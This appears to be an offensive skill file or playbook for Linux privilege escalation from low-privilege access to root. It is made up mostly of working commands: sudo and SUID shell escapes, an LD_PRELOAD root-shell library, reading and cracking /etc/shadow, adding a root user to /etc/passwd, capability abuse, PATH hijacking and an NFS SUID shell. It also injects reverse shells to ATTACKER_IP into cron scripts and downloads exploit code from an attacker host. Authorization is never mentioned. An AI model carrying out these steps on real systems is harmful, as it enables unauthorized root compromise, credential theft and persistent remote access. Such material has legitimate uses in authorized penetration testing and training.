Linux Privilege Escalation
Purpose
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
Inputs / Prerequisites
Required Access
- Low-privilege shell access to target Linux system
- Ability to execute commands (interactive or semi-interactive shell)
- Network access for reverse shell connections (if needed)
- Attacker machine for payload hosting and receiving shells
Technical Requirements
- Understanding of Linux filesystem permissions and ownership
- Familiarity with common Linux utilities and scripting
- Knowledge of kernel versions and associated vulnerabilities
- Basic understanding of compilation (gcc) for custom exploits
Recommended Tools
- LinPEAS, LinEnum, or Linux Smart Enumeration scripts
- Linux Exploit Suggester (LES)
- GTFOBins reference for binary exploitation
- John the Ripper or Hashcat for password cracking
- Netcat or similar for reverse shells
Outputs / Deliverables
Primary Outputs
- Root shell access on target system
- Privilege escalation path documentation
- System enumeration findings report
- Recommendations for remediation
Evidence Artifacts
- Screenshots of successful privilege escalation
- Command output logs demonstrating root access
- Identified vulnerability details
- Exploited configuration files
Core Workflow
Phase 1: System Enumeration
Basic System Information
Gather fundamental system details for vulnerability research:
# Hostname and system role
hostname
# Kernel version and architecture
uname -a
# Detailed kernel information
cat /proc/version
# Operating system details
cat /etc/issue
cat /etc/*-release
# Architecture
arch
User and Permission Enumeration
# Current user context
whoami
id
# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
# Users with home directories
cat /etc/passwd | grep home
# Group memberships
groups
# Other logged-in users
w
who
Network Information
# Network interfaces
ifconfig
ip addr
# Routing table
ip route
# Active connections
netstat -antup
ss -tulpn
# Listening services
netstat -l
Process and Service Enumeration
# All running processes
ps aux
ps -ef
# Process tree view
ps axjf
# Services running as root
ps aux | grep root
Environment Variables
# Full environment
env
# PATH variable (for hijacking)
echo $PATH
Phase 2: Automated Enumeration
Deploy automated scripts for comprehensive enumeration:
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Smart Enumeration
./lse.sh -l 1
# Linux Exploit Suggester
./les.sh
Transfer scripts to target system:
# On attacker machine
python3 -m http.server 8000
# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Phase 3: Kernel Exploits
Identify Kernel Version
uname -r
cat /proc/version
Search for Exploits
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh
# Manual search on exploit-db
searchsploit linux kernel [version]
Common Kernel Exploits
| Kernel Version | Exploit | CVE |
|---|---|---|
| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 |
| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 |
| 5.8+ | Dirty Pipe | CVE-2022-0847 |
Compile and Execute
# Transfer exploit source
wget http://ATTACKER_IP/exploit.c
# Compile on target
gcc exploit.c -o exploit
# Execute
./exploit
Phase 4: Sudo Exploitation
Enumerate Sudo Privileges
sudo -l
GTFOBins Sudo Exploitation
Reference https://gtfobins.github.io for exploitation commands:
# Example: vim with sudo
sudo vim -c ':!/bin/bash'
# Example: find with sudo
sudo find . -exec /bin/sh \; -quit
# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'
# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'
# Example: less with sudo
sudo less /etc/passwd
!/bin/bash
LD_PRELOAD Exploitation
When env_keep includes LD_PRELOAD:
// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find
Phase 5: SUID Binary Exploitation
Find SUID Binaries
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
Exploit SUID Binaries
Reference GTFOBins for SUID exploitation:
# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d
# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p
# Example: find with SUID
find . -exec /bin/sh -p \; -quit
Password Cracking via SUID
# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt
# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Add User to passwd (if nano/vim has SUID)
# Generate password hash
openssl passwd -1 -salt new newpassword
# Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Phase 6: Capabilities Exploitation
Enumerate Capabilities
getcap -r / 2>/dev/null
Exploit Capabilities
# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
# Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
Phase 7: Cron Job Exploitation
Enumerate Cron Jobs
# System crontab
cat /etc/crontab
# User crontabs
ls -la /var/spool/cron/crontabs/
# Cron directories
ls -la /etc/cron.*
# Systemd timers
systemctl list-timers
Exploit Writable Cron Scripts
# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
# If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh
Phase 8: PATH Hijacking
# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
# Shows: system("service apache2 start")
# Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary # Execute SUID binary
Phase 9: NFS Exploitation
# On target - look for no_root_squash option
cat /etc/exports
# On attacker - mount share and create SUID binary
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs
# Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
# On target - execute
/share/shell
Quick Reference
Enumeration Commands Summary
| Purpose | Command |
|---|---|
| Kernel version | uname -a |
| Current user | id |
| Sudo rights | sudo -l |
| SUID files | find / -perm -u=s -type f 2>/dev/null |